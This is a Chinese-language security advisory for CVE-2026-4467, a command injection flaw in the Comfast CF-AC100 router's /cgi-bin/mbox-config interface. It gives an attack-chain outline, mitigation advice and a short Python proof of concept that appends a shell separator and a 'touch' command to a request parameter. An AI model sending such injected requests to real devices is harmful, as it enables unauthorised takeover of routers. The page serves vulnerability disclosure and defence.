CVE-2026-4467 CVSS 4.7 中危

CVE-2026-4467 Comfast CF-AC100命令注入漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4467

漏洞类型

命令注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Comfast CF-AC100

漏洞概述

Comfast CF-AC100路由器固件版本2.6.0.8中存在一个命令注入漏洞。该漏洞位于/cgi-bin/mbox-config接口处理程序中，具体影响section=wireless_device_dissoc参数的处理逻辑。由于应用程序未能正确过滤用户输入，攻击者可构造恶意请求注入并执行任意操作系统命令。尽管攻击需要高权限，但利用难度较低且无需用户交互，可能导致设备被完全控制。

技术细节

该漏洞的根本原因在于Comfast CF-AC100设备的Web服务器后端在解析/cgi-bin/mbox-config请求时，将HTTP参数直接传递给了系统Shell执行环境，而未经过严格的输入清洗或转义。具体受影响的参数位于wireless_device_dissoc配置节中。攻击者通过发送特制的POST或GET请求，在参数值中追加Shell元字符（如分号;、管道符|或反引号`），即可绕过原有逻辑并执行恶意命令。鉴于CVSS向量显示需要高权限（PR:H），攻击者通常需要先登录管理后台，或结合其他漏洞获取权限后方可利用此漏洞实现远程代码执行（RCE），从而窃取敏感信息或破坏系统稳定性。

攻击链分析

STEP 1

侦察与认证

攻击者扫描目标网络，识别Comfast CF-AC100设备，并尝试获取管理员凭据以绕过高权限要求（PR:H）。

STEP 2

构造恶意载荷

攻击者构造包含Shell元字符的HTTP请求，针对/cgi-bin/mbox-config接口中的wireless_device_dissoc参数进行注入。

STEP 3

注入与执行

将恶意请求发送至目标设备，后端未过滤输入直接拼接至Shell命令，导致攻击者指定的系统命令在服务器端执行。

STEP 4

建立控制

利用执行的结果（如反弹Shell或写入Webshell），获取对设备的持久化控制权，进而窃取数据或发起进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_ip = "192.168.10.1"
url = f"http://{target_ip}/cgi-bin/mbox-config"

# Attacker controlled command (e.g., creating a file as proof)
# Note: Actual command syntax depends on the specific OS shell of the device
attacker_cmd = "touch /tmp/poc_success.txt"

# Vulnerable payload injection
# The payload injects a command separator to execute the attacker's command
payload = {
    "method": "SET",
    "section": "wireless_device_dissoc",
    "vulnerable_param": "normal_value; " + attacker_cmd
}

try:
    # Sending the malicious request
    # Authentication might be required based on PR:H
    response = requests.post(url, data=payload, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if command executed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

Comfast CF-AC100 2.6.0.8

防御指南

临时缓解措施

在官方补丁发布前，建议暂时关闭设备的远程Web管理功能，仅通过本地连接进行必要的维护。同时，应密切监控设备的系统日志和网络流量，检测是否存在针对/cgi-bin/mbox-config的可疑调用或异常的进程启动行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4467
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4467
3 Details https://www.cvedetails.com/cve/CVE-2026-4467/
4 VulDB https://vuldb.com/cve/CVE-2026-4467
5 Link https://github.com/jinhao118/cve/blob/main/ComFast%20CF-AC100-V2.6.0.8_3.md
6 Link https://vuldb.com/?ctiid.351757
7 Link https://vuldb.com/?id.351757
8 Link https://vuldb.com/?submit.772877

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表